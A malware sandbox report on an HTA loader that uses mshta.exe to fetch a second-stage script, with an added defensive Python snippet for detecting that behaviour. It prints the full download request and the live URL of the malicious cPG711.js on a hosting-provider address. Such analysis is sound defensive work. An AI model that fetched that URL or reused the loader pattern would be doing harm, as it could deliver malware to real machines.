Windows Analysis Report
65#U2465.hta

Overview

General Information

Sample name: 65#U2465.hta
renamed because original name is a hash value
Original sample name: _.hta
Analysis ID: 1592542
MD5: f03c02aef6a1354ea5dc03bd1618ffaa
SHA1: 6e23b3b6e6f24aaa974260c9f082fcfed0ffa122
SHA256: 62091fb092ddf19b73aeb835adbb9a17fa91e00fb0bf19881b2b946078f917f0
Detection

Score: 2
Range: 0 - 100
Whitelisted: false
Confidence: 80%
Note on the score: in this run the HTA did nothing beyond resolving 61.233.109.208.host.secureserver.net and fetching /GGOTSPH54/GGOTSPH54gerw/cPG711.js from it over TLS 1.2 via mshta.exe. The content of that script is not part of this report, so the low score covers the loader's own behaviour only and says nothing about the second stage it was written to retrieve.

Signatures

JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Source: unknown HTTPS traffic detected: 208.109.233.61:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
  GET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1
  Accept: */*
  Accept-Language: en-CH
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 61.233.109.208.host.secureserver.net
  Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 61.233.109.208.host.secureserver.net
Source: mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/
Source: mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp, 65#U2465.hta String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js
Source: mshta.exe, 00000002.00000003.1290196541.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.00000000035BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsVRh
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsZG
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsdll~T
Source: mshta.exe, 00000002.00000003.1290497699.0000000003597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003597000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jskT
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsuT
Source: mshta.exe, 00000002.00000002.2497161298.0000000006EE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsx
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js~T
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
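The network observations above (mshta.exe resolving a hosting-provider default hostname, connecting to 208.109.233.61:443 and requesting cPG711.js with an MSIE 7.0 user agent) are the part of this report a detection engineer would turn into rules. The following is an added example, not code from the sandbox or from the sample: it runs three checks over constructed Sysmon-style events that mirror the report (an .hta started from a user-writable path, any DNS query by mshta.exe, any mshta.exe connection to a public address), re-parses the captured HTTP request to flag the IE7-compatibility user agent on a Windows 10 build, and tests whether the contacted hostname is just the hoster's reversed-octet default label for the IP rather than a domain the operator registered. The Sysmon field names, the user-writable path set and the reversed-octet naming convention are assumptions; the firefox.exe event is a constructed benign control.

```python
"""Triage helpers for an HTA that pulls a remote script through mshta.exe.

Added example, not part of the sandbox report. The Sysmon-style events, the
re-assembled HTTP request and the benign browser event are constructed; the
field names (Image, CommandLine, QueryName, DestinationIp, DestinationPort)
follow Sysmon's schema as an assumption.
"""
import ipaddress
import re
from typing import Any, Dict, List, Tuple

MSHTA = r"C:\Windows\SysWOW64\mshta.exe"

# Constructed sample events; the first three mirror what the report observed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": MSHTA,
     "CommandLine": f'"{MSHTA}" "C:\\Users\\user\\Desktop\\65#U2465.hta"'},
    {"EventID": "22", "Image": MSHTA,
     "QueryName": "61.233.109.208.host.secureserver.net"},
    {"EventID": "3", "Image": MSHTA,
     "DestinationIp": "208.109.233.61", "DestinationPort": "443"},
    # Benign browser traffic that must not match (constructed control).
    {"EventID": "3", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": "443"},
]

# Locations a phished user can write to (assumed set; extend per estate).
USER_WRITABLE = re.compile(r"\\(Users|Temp|ProgramData)\\", re.IGNORECASE)


def is_mshta(event: Dict[str, str]) -> bool:
    return event.get("Image", "").lower().endswith("\\mshta.exe")


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for mshta.exe behaviour worth a look.
    mshta.exe has no routine need for DNS or outbound sockets, so the network
    checks fire on the first occurrence rather than on a threshold."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        if not is_mshta(ev):
            continue
        eid = ev["EventID"]
        if eid == "1":
            cmd = ev.get("CommandLine", "")
            if re.search(r"\.hta\b", cmd, re.IGNORECASE) and USER_WRITABLE.search(cmd):
                findings.append(("hta_from_user_path", cmd))
        elif eid == "22":
            findings.append(("mshta_dns_query", ev["QueryName"]))
        elif eid == "3":
            dst = ipaddress.ip_address(ev["DestinationIp"])
            if dst.is_global:
                findings.append(("mshta_outbound", f"{dst}:{ev['DestinationPort']}"))
    return findings


def provider_default_name(ip: str, suffix: str = "host.secureserver.net") -> str:
    """Hostname built from the reversed octets of `ip` under `suffix`, the
    pattern the report's host shows (61.233.109.208 for 208.109.233.61).
    Assumed to be the hoster's default label rather than a customer domain."""
    return ".".join(reversed(ip.split("."))) + "." + suffix


def is_provider_default_name(hostname: str, ip: str) -> bool:
    """True when the contacted name is only the default label for the IP,
    i.e. the operator registered no domain of their own for the server."""
    return hostname.lower().rstrip(".") == provider_default_name(ip)


# The request the report captured, re-assembled with CRLF line ends (constructed).
SAMPLE_REQUEST = (
    "GET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-CH\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; "
    "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
    ".NET CLR 3.5.30729)\r\n"
    "Host: 61.233.109.208.host.secureserver.net\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)


def parse_request(raw: str) -> Dict[str, Any]:
    """Split an HTTP/1.1 request head into its request line and a lower-cased
    header map; a repeated header name keeps the last value seen."""
    head = raw.partition("\r\n\r\n")[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


LEGACY_UA = re.compile(r"MSIE 7\.0;.*Windows NT 10\.0;.*Trident/7\.0")


def legacy_engine_script_fetch(req: Dict[str, Any]) -> bool:
    """Flag a .js fetch that advertises the IE7 compatibility UA on a
    Windows 10 build: the WinINET/MSHTML fingerprint this mshta.exe run left."""
    ua = req["headers"].get("user-agent", "")
    return bool(LEGACY_UA.search(ua)) and str(req["target"]).lower().endswith(".js")
```

Run `triage(SAMPLE_EVENTS)` to get the three findings for the mshta.exe events and nothing for the browser event; `is_provider_default_name("61.233.109.208.host.secureserver.net", "208.109.233.61")` is true for this report's host, which is a useful triage hint (no vanity domain, throwaway hosting) but not a verdict on its own.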
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine Classification label: clean2.winHTA@1/0@1/1
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: mshta.exe, 00000002.00000002.2492653436.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290196541.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation